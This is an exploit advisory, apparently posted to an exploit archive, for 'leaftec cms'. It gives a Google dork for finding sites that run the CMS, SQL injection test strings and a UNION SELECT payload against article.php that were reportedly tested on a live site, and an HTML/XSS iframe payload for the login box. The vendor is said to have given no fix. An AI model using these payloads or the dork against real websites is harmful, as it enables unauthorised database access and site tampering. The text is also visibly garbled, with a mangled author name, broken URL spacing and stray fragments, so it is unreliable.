# Exploit Title: leaftec cms multiple vulnerabilities
# Date: 21.03.2010
# Author: Valentin H too many bel
# Version:
# Tested on: Debian etch
# CVE:
# Code:
: General information
: Leaftec cms multiple vulnerabilities discovered
: By Valentin H then marshbel
: Valentin@xenuser.org
: Product information
: Name = leaftec cms
: Vendor = leaftec
: Vendor Website = http://www.leaftec.de/
: About the product = http://www.leaftec.de/serv_cms.php
: Affected versions =
: Google dork: e.g. "©2006 leaftec Design"
: Vulnerabilities
#1 SQL Injection
Sadly the CMS is not available for free download but some German companies are using it.
Leaftec cms contains a blog feature which displays written content, file: article. php.
Vulnerable URL:
Http://www.some-cool-domain.tld/article.php? Id = XX
Examples for testing and injecting SQL stuff:
Http://www.some-cool-domain.tld/article.php? Id =
Http://www.some-cool-domain.tld/article.php? Id ="
Http://www.some-cool-domain.tld/article.php? Id = XX + AND + 1 = 2 + UNION + SELECT + 1, 2, 3, 4, 5, concat (version (), 7 --
(Tested on a live website using leaftec cms .)
Bytes --------------------------------------------------------------------------------------------------------
#2 XSS/HTML Code Injection
Several parts of the CMS allow HTML and Java Script code injection, e.g. the login box.
After submitting the form the cms puts a red border around the login and password field
Also implements the injected code into the website.
Example for HTML code:
"> <Iframe src = http://www.google.de> </iframe>
Bytes --------------------------------------------------------------------------------------------------------
: Additional information
: Vendor contacted = 21.03.2010
: Vulnerabilities fixed = no reply already ed
: Solution = Upgrade to version XX or higher if available